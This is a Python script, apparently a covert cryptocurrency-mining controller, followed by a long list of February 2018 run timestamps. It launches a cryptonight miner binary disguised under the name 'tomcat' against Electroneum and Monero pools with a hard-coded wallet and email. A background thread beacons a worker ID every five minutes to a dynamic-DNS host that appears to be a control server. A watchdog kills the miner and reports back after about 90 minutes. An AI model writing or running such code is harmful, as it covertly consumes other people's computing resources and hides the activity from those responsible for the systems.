import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:07.431423
#2018-02-17 16:30:01.691164
#2018-02-17 18:17:08.001405
#2018-02-17 20:03:05.206077
#2018-02-17 21:51:05.395044
#2018-02-17 23:36:04.725561
#2018-02-18 01:25:06.684047
#2018-02-18 03:12:06.807663
#2018-02-18 04:59:05.716729
#2018-02-18 06:51:05.973823
#2018-02-18 08:40:06.192821
#2018-02-18 10:26:01.400221
#2018-02-18 12:11:06.706740
#2018-02-18 13:57:04.619381
#2018-02-18 15:46:06.596874
#2018-02-18 17:36:06.541772
#2018-02-18 19:24:04.045549
#2018-02-18 21:09:03.304237
#2018-02-18 22:55:06.574936
#2018-02-19 00:43:04.932892
#2018-02-19 02:29:06.483214
#2018-02-19 04:16:05.373876
#2018-02-19 05:59:03.639612
#2018-02-19 07:47:04.066699
#2018-02-19 09:37:05.201933
#2018-02-19 11:27:04.906356
#2018-02-19 13:16:07.838216
#2018-02-19 15:05:07.882628
#2018-02-19 16:54:05.910786
#2018-02-19 18:42:05.192130
#2018-02-19 20:29:05.936522
#2018-02-19 22:17:08.143289
#2018-02-20 00:04:06.105271
#2018-02-20 01:52:06.091913
#2018-02-20 03:40:05.941002
#2018-02-20 05:26:05.572532
#2018-02-20 07:10:09.552080
#2018-02-20 08:56:03.719494
#2018-02-20 10:40:04.379650
#2018-02-20 12:25:06.377520
#2018-02-20 14:12:06.297086
#2018-02-20 15:56:07.011166
#2018-02-20 17:44:08.611383
#2018-02-20 19:36:06.772371
#2018-02-20 21:22:07.814385
#2018-02-20 23:06:04.647919
#2018-02-21 00:51:07.610207
#2018-02-21 02:36:07.907972
#2018-02-21 04:25:01.541180
#2018-02-21 06:13:01.464135
#2018-02-21 07:58:17.002175
#2018-02-21 09:43:08.037027
#2018-02-21 11:33:03.907922
#2018-02-21 13:21:06.901072
#2018-02-21 15:07:04.139893
#2018-02-21 16:56:10.003718
#2018-02-21 18:46:08.944135
#2018-02-21 20:31:03.874248
#2018-02-21 22:17:04.707727
#2018-02-22 00:06:04.876193
#2018-02-22 01:52:06.539344
#2018-02-22 03:39:03.979602
#2018-02-22 05:26:04.806508
#2018-02-22 07:11:03.452633
#2018-02-22 08:58:01.341882
#2018-02-22 10:46:06.875098
#2018-02-22 12:34:08.041639
#2018-02-22 14:20:14.697540
#2018-02-22 16:09:10.103242
#2018-02-22 17:56:01.496193
#2018-02-22 19:44:06.178789
#2018-02-22 21:34:01.964197
#2018-02-22 23:21:03.752447
#2018-02-23 01:09:05.884673
#2018-02-23 02:55:04.155554
#2018-02-23 04:41:06.192758
#2018-02-23 06:28:01.360778
#2018-02-23 08:14:07.594126
#2018-02-23 10:31:08.157398
#2018-02-23 12:24:01.720119
#2018-02-23 14:13:04.644119
#2018-02-23 16:05:07.748482
#2018-02-23 17:51:07.127963
#2018-02-23 19:37:07.193163
#2018-02-23 21:20:08.473127
#2018-02-23 23:09:03.930772
#2018-02-24 00:57:04.333150
#2018-02-24 02:52:04.526745
#2018-02-24 04:42:01.316449
#2018-02-24 06:25:09.070587
#2018-02-24 08:13:04.656377
#2018-02-24 09:56:07.027187
#2018-02-24 11:51:05.029726
#2018-02-24 13:42:07.159971
#2018-02-24 15:29:05.051628
#2018-02-24 17:23:04.997380
#2018-02-24 19:11:01.468161
#2018-02-24 21:00:05.163493
#2018-02-24 23:31:01.216085
#2018-02-25 02:54:05.692311
#2018-02-25 06:33:06.721710